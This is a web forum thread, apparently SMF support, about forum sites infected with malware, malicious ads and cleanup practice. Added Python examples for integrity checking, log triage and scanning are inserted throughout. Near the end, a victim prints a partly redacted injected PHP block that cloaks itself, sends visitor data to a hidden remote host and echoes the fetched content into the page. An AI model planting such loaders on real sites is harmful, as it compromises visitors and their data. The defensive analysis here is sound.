For a small enough site, agreed. If it's a busy site you might notice some performance impact, but it will be up to you to determine if it's too bad to leave off for a while.
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
Quote
Also, while you're locking things down, check all the files in every directory to see if they are supposed to be there. On that earlier infection on DreamHost I found a PHP-based shell tool hidden a few directories deep.
Keep an eye out for "hidden" files (starting with a period) that may not show up in your host File Manager or FTP. Make sure you can see any (such as .htaccess). Also don't just "eyeball" file names -- hackers generally aren't dumb enough to give obvious names like "spreadInfection.php" to their files -- they'll be something important and official sounding, such as PermissionsCheck.php and the like. Compare your list of files to a fresh copy of SMF to make sure of what's supposed to be there. Also compare file sizes and last modified dates -- has a file been changed later than you can account for? An automated checking tool would be good for this (even better, doing an MD5 checksum on each file).
I find the "find" tool works great. Doing some checks for files that have been modified in the last x days should give a small list of things to check. It'll also return hidden files (dot-files) that exist and have been modified in that time period. That's how I found the PHP shell file.
Once you get a good check of all the files, a tool like AIDE or Tripwire is useful as you'll get a report when the file changes (both tools look at checksums of files to see if the contents changed).
Quote from: MrPhil on December 26, 2011, 10:31:51 PM
It's always possible that they've found an entry that no one at SMF knows about. Just as likely, though, is that your host has a security problem of their own that is allowing the hacker to get in as "owner" and do whatever they want.
I'd argue that it's more likely to be a server or environment issue than an SMF issue. It's really easy to mess up on a configuration and much less likely that only one group/person found a specific SMF security hole that is only being used against a single target.
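The two checks described above (compare the deployed tree against a fresh copy of the package, checksum by checksum, and list everything touched in the last x days, dot-files included) as one added example. This is not code from the thread or from SMF; it is a stand-alone Python script, the file names and the temporary directories it builds are constructed for the demonstration, and it uses SHA-256 rather than the MD5 mentioned above because MD5 collisions are cheap to produce.

```python
"""Added example (not from the thread or from SMF): baseline-compare a deployed
web root against a fresh copy of the same software, and list everything touched
in the last N days, dot-files included.  Paths and sample files are constructed."""
import hashlib
import os
import tempfile
import time
from pathlib import Path


def hash_tree(root):
    """Map each file's path (relative to root) to its SHA-256 digest.
    os.walk lists dot-files and dot-directories like any other entry,
    so nothing hidden from a GUI file manager or FTP client is skipped."""
    digests = {}
    root = Path(root)
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[str(path.relative_to(root))] = h.hexdigest()
    return digests


def compare_trees(fresh_root, deployed_root):
    """Classify deployed files against the fresh copy: added (not in the
    pristine package at all), modified (same path, different content) and
    removed (in the package but missing from the deployment)."""
    fresh = hash_tree(fresh_root)
    deployed = hash_tree(deployed_root)
    return {
        "added": sorted(p for p in deployed if p not in fresh),
        "modified": sorted(p for p in deployed if p in fresh and deployed[p] != fresh[p]),
        "removed": sorted(p for p in fresh if p not in deployed),
    }


def recently_modified(root, days, now=None):
    """Equivalent of `find root -mtime -days`: files whose mtime falls within
    the last `days` days, returned with their mtimes so they can be lined up
    against the access logs afterwards."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    hits = []
    root = Path(root)
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            mtime = path.stat().st_mtime
            if mtime >= cutoff:
                hits.append((str(path.relative_to(root)), int(mtime)))
    return sorted(hits)


def _write(path, content, mtime):
    """Create a sample file with a chosen modification time (constructed data)."""
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(content)
    os.utime(path, (mtime, mtime))


def demo(now=None):
    """Build a constructed 'fresh package' and 'deployed web root' in a temp
    directory and run both checks.  File names are invented for the demo."""
    now = time.time() if now is None else now
    base = Path(tempfile.mkdtemp(prefix="smf-check-"))
    fresh, deployed = base / "fresh", base / "deployed"
    old = now - 400 * 86400        # long before any incident
    recent = now - 2 * 86400       # two days ago
    _write(fresh / "index.php", "<?php echo 'forum'; ?>\n", old)
    _write(fresh / "Sources/Load.php", "<?php // loader ?>\n", old)
    _write(deployed / "index.php", "<?php echo 'forum'; ?>\n", old)
    # same path as the package, but content appended later
    _write(deployed / "Sources/Load.php", "<?php // loader ?>\n// appended later\n", recent)
    # official-sounding name inside a dot-directory, not in the package at all
    _write(deployed / ".cache/PermissionsCheck.php", "<?php // not part of the package ?>\n", recent)
    return {"diff": compare_trees(fresh, deployed),
            "recent": [p for p, _ in recently_modified(deployed, 7, now)]}


if __name__ == "__main__":
    print(demo())
```

Run it against a real deployment by calling compare_trees() with the unpacked download as the first argument and the web root as the second; anything in "added" or "modified" that you cannot account for (a customised theme, a mod you installed) is what to open next.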
I need to weigh in here with my own issues. My forum members (and I have a very large forum) have been reporting since December 10th that they have either been infected with malware from my site, in particular the forum, or their AV has been blocking attempted intrusions. Some have been very specific as to where they were reading in the forum when this occurred.
An analysis of the 20 or so reports showed 3 Norton users reporting that Norton had blocked Malicious Toolkit from their computers. The rest reported either attempts to install or actual infections of several variants of rogue antivirus viruses (Win 7, VISTA 2012, Antivirii 2011) while using AVG, McAfee, Avast and MSE. Users of malwarebyte reported they were getting nothing.
I contacted Google Webmaster Help. A Google Diagnostic Scan of my site on December 10 showed that no malware has been delivered from my site in the previous 90 days. Google did a more thorough scan of 30 pages on December 24th and still found nothing suspicious coming from my site. My hosting provider, who happens to be MonteCarloHosting.net (owner Christian is a mod on one of the SMF forum boards), did a server scan and found nothing. My forum is on a dedicated server. Our AV software, Zone Alarm, was not finding anything. My moderators were not getting any AV alerts or infections.
My husband, the IT guy, did a clean reinstall of the SMF software after reading this thread. All passwords were changed. I deleted unused themes and the one mod package I was using. Also upgraded to 2.0.2 within hours of it being released (was on 2.0) . Google Adsense ad were also turned off the forum for two days.
However, last night when I turned the ads back on, I promptly got an alert from Zone Alarm asking for permission to run a program from my local settings/temp directory which appeared to be malware by its name, a long string of letters and numbers followed by .exe. I took a screen shot of my desktop at the time which shows I am on SMF, which ads were displaying and the AV notice. I have already reported the possible problem to Google and turned off my ads again. Not happy about that. I'm still monitoring members to see if anyone is still getting malware while on the site.
that does not sound like an smf issue, it sounds like an issue with your ads. there is nothing we can do to help that.
Dame2,
Sounds exactly like what we have going on. I am 98% sure it was an exploit in simple machines that allowed the virus to write to files on the server. Both times we've had issues, Simple Machines released a "security patch" right after we found we had an issue. In both cases, Simple machines will not say what the Security issue was, which is very disappointing. I can't help if I don't know what they changed.
Worse, I'm not sure that using the upgrade package on Simple machines gets rid of it. It looks more like the exploit in Simple Machines allows this thing to write to anywhere in your root directory - meaning you can replace all the simple machines files and it won't get rid of it. I've had 3 outside groups look at it, and all fingers point to simple machines. The server checks out, the other software checks out, and I've checked every single google ad with the help of google.
We have two ad servers on the site - google and a server we built ourselves. I experimented with shutting one off, then the other, and there really was no change. We have inspected *every* line of code elsewhere on the site, and we even searched the database(s) and came up with nothing.
This issue has cut my traffic from 200,000 visitors a month down to 50,000. We are seriously looking at building our own forum or if we have to, using vbulletin.
Quote
Some have been very specific as to where they were reading in the forum when this occurred.
When we were having problems, some users put into posts what they were seeing, in some cases posting code that caused the AVG software to go off. Delete the post and that problem stops.
Quote
I contacted Google Webmaster Help. A Google Diagnostic Scan of my site on December 10 showed that no malware has been delivered from my site in the previous 90 days. Google did a more thorough scan of 30 pages on December 24th and still found nothing suspicious coming from my site. My hosting provider, who happens to be MonteCarloHosting.net (owner Christian is a mod on one of the SMF forum boards), did a server scan and found nothing. My forum is on a dedicated server. Our AV software, Zone Alarm, was not finding anything. My moderators were not getting any AV alerts or infections.
Ditto, except my server is at another provider, whom I do not want to embarrass here, in case they have done everything right.
Moving this to the top so it's seen:
Flavious, here's what I'll do. I'm fairly convinced that SMF itself isn't at fault here, so I'm offering my time to inspect your server environment, run some checks, and even help configure a tool like AIDE or TripWire so you can get some proactive alerts if something should happen. The place I work normally charges close to $200 per hour for my time doing something like this, but I'll do this for free on my personal time as long as you agree to allow me to publish any findings as to the cause, if I should be able to determine it.
Dame2, if the issue only showed up after you turned advertising back on, it sounds like an infected ad. This has been known to happen. If you can pin down the ad causing the issue, you can usually report it to the ad network and get it removed.
Quote from: Flavious on December 29, 2011, 12:07:18 PM
Sounds exactly like what we have going on. I am 98% sure it was an exploit in simple machines that allowed the virus to write to files on the server. Both times we've had issues, Simple Machines released a "security patch" right after we found we had an issue. In both cases, Simple machines will not say what the Security issue was, which is very disappointing. I can't help if I don't know what they changed.
If you have that much certainty, you must have some evidence aside from timing. Please send the evidence to security>at<simplemachines.org and it will be reviewed by the developers.
I'm not aware of any vendor that will provide exploit code for their own product. To determine the issue, look at the patch that was provided. The changes will point at the problem code. If the issue was found externally and released, there are several places you can find exploit code.
Quote from: Flavious on December 29, 2011, 12:07:18 PM
Worse, I'm not sure that using the upgrade package on Simple machines gets rid of it. It looks more like the exploit in Simple Machines allows this thing to write to anywhere in your root directory - meaning you can replace all the simple machines files and it won't get rid of it. I've had 3 outside groups look at it, and all fingers point to simple machines.
Once again, please send the details to that above e-mail address. If three outside groups found evidence, certainly you can notify the vendor, right?
By the way, SMF can't trump filesystem security. If you want to be sure, make every single file and directory in your web root read-only.
If you want to get serious to tracking this thing down, install AIDE or Tripwire and keep all your request logs. When you get a ping on a changed file from the tool, check request and error logs for around the time of the file creation - at worst a 24 hour period if you can't narrow the hours.
As a system administrator professionally, I've had to investigate several breached servers. The usual suspect is rarely the cause. Nine out of ten times, the breach is due to:
- Unpatched third-party code due to the client not using the product anymore and forgetting it was still accessible
- A really poor server security configuration, usually lack of partitioning among services and multiple websites
- Badly-written custom code allowing various injection or directory-traversal attacks
Recurrent infections usually stem from a continued problem with the above or failure to clean out the entire infection, keeping a back-door open for the attacker. If you have poor logging in place, it's usually easier to rebuild an environment from scratch than audit everything.
Also, when I speak of an "attacker", 98% of the time it's some automated thing out there blasting sample exploit code blindly hoping to get a hit. It's almost never an actual intelligent human actively doing things.
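The log-correlation step above (take the timestamp of the changed file, then read the request log for the hours around it) as an added example. It is not code from the thread or from SMF; it is a stand-alone Python script, and the log lines, IP addresses, paths and the changed-file timestamp are all constructed for the demonstration.

```python
"""Added example, not from the thread or from SMF: correlate a changed file's
timestamp with raw access-log lines.  Log lines, IPs and paths are constructed."""
import re
from datetime import datetime

# Apache/nginx "combined" log format; only the fields needed for triage are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def log_time(ts):
    """'28/Apr/2012:13:05:22 +0000' -> POSIX timestamp (float)."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").timestamp()


def parse_line(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = log_time(entry["ts"])
    return entry


def requests_near(lines, change_time, hours=1.0):
    """All parsable requests within +/- `hours` of the file change, oldest first."""
    lo, hi = change_time - hours * 3600, change_time + hours * 3600
    hits = [e for e in map(parse_line, lines) if e and lo <= e["time"] <= hi]
    return sorted(hits, key=lambda e: e["time"])


def triage(entries, change_time, changed_path):
    """What usually matters first: requests that can write (POST) up to the
    moment of the change, anything fetching the changed file afterwards,
    and how many requests each IP made inside the window."""
    def fmt(e):
        return f'{e["ip"]} {e["method"]} {e["path"]}'
    posts = [fmt(e) for e in entries if e["method"] == "POST" and e["time"] <= change_time]
    hits = [fmt(e) for e in entries
            if e["time"] > change_time
            and e["path"].split("?", 1)[0].lstrip("/") == changed_path]
    ips = {}
    for e in entries:
        ips[e["ip"]] = ips.get(e["ip"], 0) + 1
    return {"posts": posts, "hits_on_changed_file": hits, "ips": ips}


# Constructed sample log: five requests, one of them from the previous day.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Apr/2012:13:02:11 +0000] "GET /index.php?action=login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Apr/2012:13:04:58 +0000] "POST /index.php?action=post2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [28/Apr/2012:13:05:30 +0000] "GET /index.php HTTP/1.1" 200 18044 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Apr/2012:13:06:02 +0000] "GET /attachments/PermissionsCheck.php HTTP/1.1" 200 211 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Apr/2012:09:10:00 +0000] "GET /index.php?board=1.0 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]


def demo():
    """Constructed scenario: the integrity check reported a new file
    attachments/PermissionsCheck.php with an mtime of 13:05:22 on 28 April."""
    change_time = log_time("28/Apr/2012:13:05:22 +0000")
    window = requests_near(SAMPLE_LOG, change_time, hours=1)
    result = triage(window, change_time, "attachments/PermissionsCheck.php")
    result["window"] = window
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

With real logs, feed the file line by line instead of SAMPLE_LOG and widen `hours` to 12 or 24 when the mtime is all you have; a POST shortly before the change and a GET of the new file shortly after, both from the same address, is the pattern that usually identifies the entry point.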
I will take you up on that... if it happens again. I believe we found where the original bugger was written and from where it was writing files. Since deleting that, we have not had an issue, and yes, I am crossing my finger. I can get more details if you like.
To be fair, we have three possible sources of where it originally got on the server: Simple Machines and two pieces of custom PHP written way back in 2005. One of those has been eliminated, the other is highly unlikely to have an issue, but it is being upgraded to try and eliminate any possible holes.
If we take care of that, and get it again... then I'm going to need as much help as I can to get it taken care of. For now I'm just trying to convince all the users we lost that it's safe to come back. That's going to be a very difficult sell.
Thanks for the offer, and I truly appreciate all the ideas we got from here.
I'm curious, personally. If you don't want to post publicly you can send me a PM. If you don't want to disclose in PM, let me know and I'll provide my e-mail address.
If it was an SMF problem, it has not since reoccurred. There were several publishers reporting problems on Google AdSense Help forum of malware in an ad. I know of at least another large forum whose members were also reporting malware coming through Google ads and that forum is not using SMF. My forum members are not particularly geeky and it took nearly two weeks before we finally started getting good screen shots of the malware alerts so we could see what they were getting. A common denominator emerged... there was a particular originating IP address on one particular Google ad channel. Google has been, as usual, quite tightlipped about it with no admission that the malware was coming through one of their ads.
Although about 2 dozen people reported getting malware alerts from their AV, only about three or four actually got infected. If a person has a good, up to date AV software, it quarantined the virus or blocked it totally. It was a good reminder to everyone to keep their browsers, AV, AV definitions, add ons and plug-ins up to date with the latest versions and to become more "street smart" about surfing the Internet (as in "don't click on a pop-up telling you your computer is infected and directing you to click on something which does download a rogue AV to your computer").
Interesting... I see tons of people now are having problems with SMF getting hacked... we are sure now it came in from the old version of SMF. Everything else has been eliminated. We got the virus PRIOR to SMF releasing the patch. Lesson learned: Check those updates daily. Thanks for all the help everyone.
Quote from: Flavious on April 10, 2012, 05:07:21 PM
I see tons of people now are having problems with SMF getting hacked...
I looked around on the general support boards and only saw a few reports. Am I missing somewhere that those "tons" of people are posting?
Quote from: Flavious on April 10, 2012, 05:07:21 PM
we are sure now it came in from the old version of SMF. Everything else has been eliminated. We got the virus PRIOR to SMF releasing the patch. Lesson learned: Check those updates daily.
Given the last patch was released in December of 2011, even a monthly review should have brought up some awareness of the update. Also, are you sure that the issue you encountered was the exact thing fixed in the update? Simply not having recurring issues isn't enough to state that with any kind of authority.
Quote from: 青山 素子 on April 10, 2012, 05:33:55 PM
Quote from: Flavious on April 10, 2012, 05:07:21 PM
I see tons of people now are having problems with SMF getting hacked...
I looked around on the general support boards and only saw a few reports. Am I missing somewhere that those "tons" of people are posting?
Quote from: Flavious on April 10, 2012, 05:07:21 PM
we are sure now it came in from the old version of SMF. Everything else has been eliminated. We got the virus PRIOR to SMF releasing the patch. Lesson learned: Check those updates daily.
Given the last patch was released in December of 2011, even a monthly review should have brought up some awareness of the update. Also, are you sure that the issue you encountered was the exact thing fixed in the update? Simply not having recurring issues isn't enough to state that with any kind of authority.
No, because I couldn't get any answers as to *what* the update fixed. Is there a list somewhere that I missed? When the patch came out, all I recall it said was 'security issue" or something to that effect, and I could get no more details on it than that...
You can see all the exact code changes in the Updates site, and the changelogs on the downloads page.
Just for the head count ... my smf site was also hit by a trojan recently. Several people reporting a virus/infection on the site with different brands of firewall. Site has just been cleaned out and hopefully it won't come back. Don't know how it got in ... smf or mods perhaps? There was also an installation of menalto gallery 3 but that's all.
SMF 2.02, SPortal 2.3.5
What site was this on? Why the lack of information on the infected site? I read the whole post and the author didn't supply the information.
Quote from: igirisjin on April 12, 2012, 12:37:44 PM
Just for the head count ... my smf site was also hit by a trojan recently. Several people reporting a virus/infection on the site with different brands of firewall. Site has just been cleaned out and hopefully it wont come back. Dont know how it got in ... smf or mods perhaps?
While possible, in my experience, where the software on the site is the latest patched version with no known vulnerabilities, it's a hosting configuration issue over 90% of the time.
Quote from: igirisjin on April 12, 2012, 12:37:44 PM
There was also an installation of menalto gallery 3 but thats all.
SMF 2.02, SPortal 2.3.5
A security update for Gallery 3 and 2 has been recently released (http://gallery.menalto.com/gallery_3_0_3_and_gallery_2_3_2). The issues that it solves are minor and XSS-related things, so I don't know that such a thing would be the root issue.
If you want to try and find the root cause, start by looking at your server logs around when the reports started coming in, and work backwards looking for suspicious activities.
Another good tool to go along with that is if you have some sort of analytics, then use it. I do use it to track trends but a lot of times I also use this to track malicious usage through the site and figure out what they were looking for and what they were poking at. I learned quite a bit of how a bot figures out forum type this way, which helps with developing anti-bot measures. I am sure though you can use it to figure out any malicious activity going on there. However there are quite a bit of limitations and not every bot has to load the analytics, so it may just give you nothing. ;)
Not sure about the originator of this thread but unfortunately people don't give details when they report the site has a virus or trojan - even people over on simple portal - 3 reported firewall blocking the site but no details. So I have none.
I couldn't get any warning with comodo or avg and over 10 site scanning services.
One friend/site member reported it also - will ask if he has any details.
The linked site in my signature was infected.
Quote from: nend on April 12, 2012, 01:34:55 PM
not every bot has to load the analytics, so it may just give you nothing. ;)
This is why raw server access and error logs are best. You can see the raw IPs (impossible with many of the hosted analytics packages), view the URLs, and track activity and referrers. Also, since these are generated on the server for every access, nobody can avoid being logged.
This was one possibly on my site before ...
Trojan Downloader : Win32/Karagany.I
Alert level: severe.
Update ... hacked again.
Site was a bit slow and then avg browser guard started giving warnings. I don't have access logs older than a few days and wouldn't know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.
Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.
This is the code added on to the end of the index.php file while I was away on a trip.
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( '{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
(edit: removed base64 string to render code (semi-)unusable)
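The injected block above has a recognisable shape: it branches on the visitor's User-Agent so that search-engine crawlers (and, here, several browsers) never see it, hides its callback URL in a base64 literal, fetches remote content with curl and echoes it into the page, and sits in a second PHP block after the file's closing tag. The following added example (not code from the thread, the poster or SMF) is a small Python scanner that looks for those indicators in PHP source, scores a file as suspicious when two or more are present, and decodes any base64 literal so it can be reported without anyone visiting it. The two sample sources are constructed, the decoded address is the reserved name example.invalid, and the thresholds are my own choice.

```python
"""Added example, not from the thread or from SMF: flag PHP source that shows the
indicators of the user-agent-cloaking injection discussed above.  The sample
PHP below is constructed and non-functional; it exists only to be scanned."""
import base64
import re

# String literals the injection tests the User-Agent against before cloaking.
SEARCH_ENGINE_TOKENS = ("google", "yahoo", "bing", "msn", "baidu", "bot")
# base64_decode() applied to an embedded literal of at least 8 base64 chars.
B64_LITERAL_RE = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]{8,})['"]\s*\)""")


def decoded_literals(src):
    """Decode every base64_decode('...') literal that yields printable ASCII,
    so the callback address can be reported instead of executed."""
    out = []
    for lit in B64_LITERAL_RE.findall(src):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


def scan_php_source(src):
    """Return a list of human-readable findings for one PHP file's contents."""
    findings = []
    low = src.lower()
    if "http_user_agent" in low:
        quoted = sum(1 for t in SEARCH_ENGINE_TOKENS if f"'{t}'" in low or f'"{t}"' in low)
        if quoted >= 2:
            findings.append("cloaking: behaviour branches on search-engine user agents")
    if B64_LITERAL_RE.search(src):
        findings.append("base64_decode() of an embedded literal (obfuscated string, often a URL)")
    if "curl_init" in low and "curl_exec" in low and re.search(r"echo\s+\$\w+", src):
        findings.append("remote content fetched with curl and echoed into the page")
    if re.search(r"\?>\s*<\?php", src):
        findings.append("a second PHP block follows a closing tag (appended code)")
    return findings


def is_suspicious(src, threshold=2):
    """Two independent indicators is the cut-off used here (an assumption)."""
    return len(scan_php_source(src)) >= threshold


# Constructed stand-in for a clean index.php.
CLEAN = (
    "<?php\n"
    "// constructed stand-in for a clean forum index.php\n"
    "require_once('Sources/Load.php');\n"
    "echo 'forum';\n"
    "?>\n"
)

# Constructed injected variant: the same file with a cloaking block appended.
# The encoded address is the reserved name example.invalid, not a real host.
SAMPLE_B64 = base64.b64encode(b"http://example.invalid/stat.php").decode()
INJECTED = CLEAN + (
    "<?php\n"
    "if (!isset($sRetry)) {\n"
    "  $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);\n"
    "  if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'bot') == false)) {\n"
    "    $stCurlLink = base64_decode('" + SAMPLE_B64 + "') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);\n"
    "    $h = @curl_init($stCurlLink);\n"
    "    $sResult = @curl_exec($h);\n"
    "    echo $sResult;\n"
    "  }\n"
    "}\n"
    "?>\n"
)


if __name__ == "__main__":
    for label, src in (("clean", CLEAN), ("injected", INJECTED)):
        print(label, is_suspicious(src), scan_php_source(src), decoded_literals(src))
```

To sweep a web root, read each .php file and pass its text to scan_php_source(); the integrity comparison against a fresh package is still the authoritative check, since this scanner only recognises the pattern seen in this thread and will miss code written differently.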
If you decode the base64 that is in the script you end up with this url.
http://{snap}.com/stat/stat.php
The site is unavailable though. :-\
(edit: removed possible malicious URL)
You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.
I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.
I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)
Quote from: 医生唱片骑师 on May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)
That only works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.
update:
One thing happened today that also happened at the time the site was first hacked, and only those times.
This was related to playing movies in Aeva media. It shows a plugin required and link to download. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the aeva movie plugin download link. It didn't work playing the movies either. These actions only happened twice and both coincidentally related to virus trouble through SMF/Aeva media.
I know some so called free firefox plugins from dodgy commercial site have caused similar problems.
Not sure if this error is related or not.
XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2: <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^